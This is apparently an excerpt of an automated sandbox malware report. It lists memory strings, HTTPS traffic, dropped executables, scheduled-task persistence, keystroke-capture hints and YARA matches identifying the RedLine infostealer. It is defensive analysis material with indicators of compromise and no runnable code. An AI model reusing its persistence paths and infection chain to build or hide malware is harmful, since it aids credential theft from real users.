00000014.00000003.2982109651.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2976229869.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3045621635.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3047540207.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3061893476.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3051616013.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/ata
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/efox/
Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/efox/)P
Source: c884f8452a.exe, 00000014.00000003.2983852225.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2980828476.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2967717535.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2990613852.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2968806377.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2977343403.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2985210515.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2979590771.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2961847631.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2972083170.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963538373.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2970867053.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2974258010.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2982109651.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2976229869.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3045621635.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3047540207.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3061893476.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3051616013.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/irefox
Source: 831840b410.exe, 0000002F.00000003.3475843478.00000000040CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account7
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountA
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountJ
Source: 831840b410.exe, 00000010.00000003.3086222866.0000000003789000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3110190311.00000000037C9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3087346454.00000000037C2000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3086571979.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3085650788.0000000003780000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3086442731.00000000037A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountL
Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountM)
Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountT)
Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountd
Source: 831840b410.exe, 0000001F.00000003.3234149280.0000000004060000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000002.3243043765.0000000004062000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237964866.0000000004062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountfmF(
Source: 831840b410.exe, 00000010.00000003.3105319797.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3102067403.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountp
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50143
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50555
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50555 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49874 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.25:443 -> 192.168.2.5:50555 version: TLS 1.2
Installs a raw input device (often for capturing keystrokes)
Source: 831840b410.exe, 00000010.00000003.3086222866.0000000003789000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _WINAPI_GETRAWINPUTDATA memstr_3557b1e0-b

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
Binary is likely a compiled AutoIt script file
Source: 831840b410.exe, 00000010.00000002.3114626852.0000000000D62000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_4225168b-d
Source: 831840b410.exe, 00000010.00000002.3114626852.0000000000D62000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_d6ec061c-0
Source: 831840b410.exe, 0000001F.00000000.2949970716.0000000000D62000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_529da930-c
Source: 831840b410.exe, 0000001F.00000000.2949970716.0000000000D62000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_a690d9de-5
Source: 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_8b2b90e1-e
Source: 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_8a9ef8f4-3
PE file contains section with special chars
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: .idata
Source: amert.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: c884f8452a.exe.6.dr Static PE information: section name:
Source: c884f8452a.exe.6.dr Static PE information: section name: .idata
Source: c884f8452a.exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: .idata
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: chrosha.exe.14.dr Static PE information: section name:
Source: chrosha.exe.14.dr Static PE information: section name: .idata
Source: chrosha.exe.14.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name: .idata
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name: .idata
Source: MPGPH131.exe.20.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File created: C:\Windows\Tasks\chrosha.job
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B85DC8 0_2_00B85DC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00BCA220 0_2_00BCA220
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B84E60 0_2_00B84E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0074A220 2_2_0074A220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00744330 2_2_00744330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_007394E3 2_2_007394E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00748DBB 2_2_00748DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00704E60 2_2_00704E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00748669 2_2_00748669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00748EDB 2_2_00748EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_007447C8 2_2_007447C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_0074A220 3_2_0074A220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00744330 3_2_00744330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_007394E3 3_2_007394E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00748DBB 3_2_00748DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00704E60 3_2_00704E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00748669 3_2_00748669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00748EDB 3_2_00748EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_007447C8 3_2_007447C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848CC77F8 11_2_00007FF848CC77F8
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003A6809 14_2_003A6809
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003A707B 14_2_003A707B
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003660E0 14_2_003660E0
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003A24D0 14_2_003A24D0
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003A2968 14_2_003A2968
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_0036CE00 14_2_0036CE00
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003A7EB0 14_2_003A7EB0
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_00368310 14_2_00368310
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003A6F5B 14_2_003A6F5B
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_00397780 14_2_00397780
